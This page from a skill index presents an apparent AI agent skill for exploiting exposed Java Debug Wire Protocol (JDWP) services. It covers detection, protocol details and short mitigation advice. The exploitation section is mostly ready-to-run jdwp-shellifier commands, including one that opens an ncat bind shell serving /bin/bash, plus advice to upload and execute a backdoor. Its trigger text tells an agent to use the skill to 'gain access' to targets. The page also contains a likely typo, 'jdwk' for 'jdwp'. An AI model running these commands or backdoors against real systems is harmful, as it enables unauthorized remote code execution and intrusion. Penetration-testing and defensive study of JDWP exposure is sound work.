OpenSkillIndex← back to search

Hacktricks-skills pentest-jdwp-exploitation

Exploit exposed Java Debug Wire Protocol (JDWP) services for remote code execution. Use this skill whenever you need to test JDWP vulnerabilities, enumerate Java debug services, or gain access to Java applications with debug ports exposed. Trigger on mentions of JDWP, Java debug ports, port 8000, Java application security testing, or debugging protocol exploitation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol/SKILL.MD
source content

JDWP Exploitation Skill

Overview

The Java Debug Wire Protocol (JDWP) is a packet-based network binary protocol used for debugging Java applications. When exposed to networks without authentication or encryption, it can be exploited for remote code execution.

When to Use This Skill

  • Testing Java applications with exposed debug ports
  • Enumerating JDWP services on target networks
  • Gaining access to Java applications with debug functionality enabled
  • Security assessments involving Java infrastructure
  • Investigating suspicious Java processes with debug capabilities

Detection

Port Scanning

JDWP services typically run on port 8000, though other ports are possible. Scan common ports and any custom ports configured in the target environment.

Handshake Fingerprinting

Send "JDWP-Handshake" to the target port. If a JDWP service responds with the same string, it confirms the service is active. This handshake acts as a fingerprinting method to identify JDWP services on the network.

Process Detection

Search for the string "jdwk" in Java processes to identify active JDWP sessions on the target system.

Exploitation

Primary Tool: jdwp-shellifier

The recommended exploitation tool is jdwp-shellifier.

Basic Usage

# Obtain internal data from the target
./jdwp-shellifier.py -t <target-ip> -p <port>

# Execute a command on the target
./jdwp-shellifier.py -t <target-ip> -p <port> --cmd '<command>'

# Use a specific breakpoint for more stable exploitation
./jdwp-shellifier.py -t <target-ip> -p <port> --break-on 'java.lang.String.indexOf' --cmd '<command>'

Stability Tips

  1. Use 
    --break-on 'java.lang.String.indexOf'
    for more stable exploitation instead of the default 
    java.net.ServerSocket.accept
  2. If possible, upload and execute a backdoor instead of running commands directly for even greater stability
  3. The exploit works across various JDK versions and is platform-independent

Example Commands

# Basic reconnaissance
./jdwp-shellifier.py -t 192.168.2.9 -p 8000

# Reverse shell via ncat
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash'

# Stable exploitation with custom breakpoint
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash'

Protocol Details

JDWP Handshake

  • 14-character ASCII string: "JDWP-Handshake"
  • Exchanged between Debugger (client) and Debuggee (server)
  • Used to initiate communication and confirm service presence

Message Structure

  • Length field
  • Id field
  • Flag field
  • CommandSet field (values range from 0x40 to 0x80, representing different actions and events)

Exploitation Process

  1. Fetch Java Runtime references
  2. Set breakpoints on target methods
  3. Invoke arbitrary methods and bytecode
  4. Execute commands or load malicious classes

Security Considerations

  • JDWP lacks authentication and encryption by design
  • Should never be exposed to production networks or hostile environments
  • Regular security reviews should disable debug functionality in production
  • Proper firewall configurations are essential to prevent unauthorized access
  • Monitor for JDWP services on internet-facing systems using Shodan or similar tools

References